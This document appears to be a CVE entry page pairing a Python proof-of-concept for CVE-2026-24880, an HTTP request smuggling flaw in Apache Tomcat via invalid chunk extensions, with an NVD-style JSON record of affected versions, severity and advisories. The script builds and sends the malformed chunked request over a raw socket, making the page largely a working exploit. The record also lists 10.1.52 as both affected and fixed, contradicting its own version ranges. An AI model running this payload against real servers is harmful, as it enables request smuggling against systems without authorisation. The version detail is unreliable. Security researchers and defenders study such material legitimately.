CVE-2026-24880

import socket # PoC for CVE-2026-24880 # This script demonstrates sending a request with an invalid chunk extension # to trigger the HTTP Request Smuggling vulnerability in Apache Tomcat. def send_smuggling_request(host, port): # Constructing the malicious payload with invalid chunk extension payload = ( "POST / HTTP/1.1\r\n" f"Host: {host}\r\n" "Transfer-Encoding: chunked\r\n" "\r\n" "5;invalid_extension=foo\r\n" # Invalid chunk extension "ABCDE\r\n" "0\r\n" "\r\n" ) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload.encode('utf-8')) print("[+] Payload sent successfully.") response = s.recv(4096) print("[+] Response received:") print(response.decode('utf-8')) s.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target_host = "127.0.0.1" target_port = 8080 send_smuggling_request(target_host, target_port)

{"cve": {"id": "CVE-2026-24880", "sourceIdentifier": "[email protected]", "published": "2026-04-09T20:16:24.060", "lastModified": "2026-04-14T20:02:48.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in Apache Tomcat via invalid chunk extension.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, from 10.1.0-M1 through 10.1.52, from 9.0.0.M1 through 9.0.115, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\nOther, unsupported versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.20, 10.1.52 or 9.0.116, which fix the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.0.0", "versionEndExcluding": "9.0.116", "matchCriteriaId": "051BCE94-78FA-4820-B75F-4819080BCCC8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.1.0", "versionEndExcluding": "10.1.53", "matchCriteriaId": "D0914AD3-D9E6-470C-A858-64D0CFA3F733"}, {"vulnerable": true, "criteria": "cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.20", "matchCriteriaId": "1F39B82B-0E67-459D-8065-2C6EE7970D0D"}]}]}], "references": [{"url": "https://lists.apache.org/thread/2c682qnlg2tv4o5knlggqbl9yc2gb5sn", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/09/20", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}